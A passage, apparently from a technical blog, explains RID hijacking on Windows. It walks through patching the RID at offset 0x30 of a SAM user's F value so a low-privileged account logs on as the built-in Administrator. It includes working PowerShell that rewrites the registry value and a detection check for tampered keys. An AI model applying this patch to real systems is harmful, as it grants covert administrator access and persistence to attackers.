NT SYSTEM access to it.
The user hijacked is a low-privileged user and has an RID of 1006 (0x3ee):
Trying to write to c:\windows\ as hijacked, as expected, we get Access is Denied:
that is used by LSASS during the user logon/authentication process. Specifically, at offset 0030 in the value F there are bytes that denote the user's RID, which in our case are 03ee (1006) for the user hijacked. The RID is stored as a little-endian DWORD, so in a hex view of the value the four bytes at offset 0030 read ee 03 00 00:
Changing that RID from 3ee to 1f4 (500, the RID of the built-in Administrator account) lets the user hijacked assume administrator privileges:
After changing the RID from 3ee to 1f4 and creating a new logon session (the F value is only consulted at logon, so an existing session keeps its old token), we can see that the user hijacked is now allowed to write to c:\windows\, suggesting it now has administrative privileges:
Note that hijacked still does not belong to the local Administrators group, but its RID is now 500, so LSASS builds its logon token with the SID of the built-in Administrator account (the SID ending in -500, visible with whoami /user in the new session):
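The read-and-patch procedure described above, as an added PowerShell example that is not code from the original post: it decodes the little-endian RID at offset 0x30 of a SAM user key's F value, patches it, and, as the defender's counterpart, lists user keys whose stored RID no longer matches the key name. The function names and the constructed sample F bytes are this example's own; the functions that touch the registry assume a shell already running as NT SYSTEM.

```powershell
# Added example (not the original author's code): decode and patch the RID stored at
# offset 0x30 of the F value under HKLM\SAM\SAM\Domains\Account\Users\<RID>.
# Reading or writing HKLM\SAM requires NT SYSTEM, e.g.: psexec.exe -s -i powershell.exe
# Function names and the constructed sample bytes are this example's own assumptions.

$RidOffset = 0x30   # the RID lives in the 4 bytes at offset 0x30, little-endian DWORD

function Get-SamUserKeyPath {
    param([Parameter(Mandatory)][uint32]$Rid)
    # Subkeys under ...\Users are named by the RID as 8 upper-case hex digits, e.g. 000003EE
    return ('HKLM:\SAM\SAM\Domains\Account\Users\{0:X8}' -f $Rid)
}

function Get-RidFromF {
    param([Parameter(Mandatory)][byte[]]$F)
    if ($F.Length -lt ($RidOffset + 4)) { throw "F value too short: $($F.Length) bytes" }
    # bytes EE 03 00 00 at 0x30 -> 0x000003EE -> 1006
    return [BitConverter]::ToUInt32($F, $RidOffset)
}

function Set-RidInF {
    param([Parameter(Mandatory)][byte[]]$F, [Parameter(Mandatory)][uint32]$NewRid)
    $patched = [byte[]]$F.Clone()
    $le = [BitConverter]::GetBytes($NewRid)          # 0x1F4 -> F4 01 00 00
    [Array]::Copy($le, 0, $patched, $RidOffset, 4)
    return $patched
}

function Read-SamUserRid {
    param([Parameter(Mandatory)][uint32]$KeyRid)
    $f = (Get-ItemProperty -Path (Get-SamUserKeyPath $KeyRid) -Name F).F
    return (Get-RidFromF $f)
}

function Write-SamUserRid {
    param([Parameter(Mandatory)][uint32]$KeyRid, [Parameter(Mandatory)][uint32]$NewRid)
    $path    = Get-SamUserKeyPath $KeyRid
    $f       = (Get-ItemProperty -Path $path -Name F).F
    $patched = Set-RidInF -F $f -NewRid $NewRid
    Set-ItemProperty -Path $path -Name F -Value $patched -Type Binary
    return (Read-SamUserRid $KeyRid)                   # read back to confirm the write
}

function Find-HijackedSamUsers {
    # Detection check: the key name keeps the original RID, so a key whose name differs
    # from the RID at 0x30 of its F value has been tampered with.
    Get-ChildItem 'HKLM:\SAM\SAM\Domains\Account\Users' |
        Where-Object { $_.PSChildName -match '^[0-9A-F]{8}$' } |
        ForEach-Object {
            $keyRid = [Convert]::ToUInt32($_.PSChildName, 16)
            $f = (Get-ItemProperty -Path $_.PSPath -Name F -ErrorAction SilentlyContinue).F
            if ($f -and ((Get-RidFromF $f) -ne $keyRid)) {
                [pscustomobject]@{ Key = $_.PSChildName; RidInF = (Get-RidFromF $f) }
            }
        }
}

# --- Offline demonstration on a constructed F value (not a real SAM dump) ---
$sampleF = New-Object byte[] 0x50
$sampleF[0x30] = 0xEE; $sampleF[0x31] = 0x03        # RID 0x3EE = 1006 (user "hijacked")
'RID before: {0} (0x{0:X})' -f (Get-RidFromF $sampleF)
$patchedF = Set-RidInF -F $sampleF -NewRid 0x1F4
'RID after:  {0} (0x{0:X})' -f (Get-RidFromF $patchedF)

# --- Live use as NT SYSTEM (uncomment): point the user under key 000003EE at RID 500 ---
# Write-SamUserRid -KeyRid 0x3EE -NewRid 0x1F4
# Then log on as hijacked in a new session and check: whoami /user   (SID ends in -500)
# Find-HijackedSamUsers   # lists every user key whose F value no longer matches its name
```

The write only takes effect for logon sessions created after the change, which is why the post re-logs on before testing access to c:\windows\. The key-name-versus-F-value comparison in Find-HijackedSamUsers is the simplest on-host check for this technique, since the hijack alters only the F bytes and leaves the subkey name, and the user's group memberships, untouched.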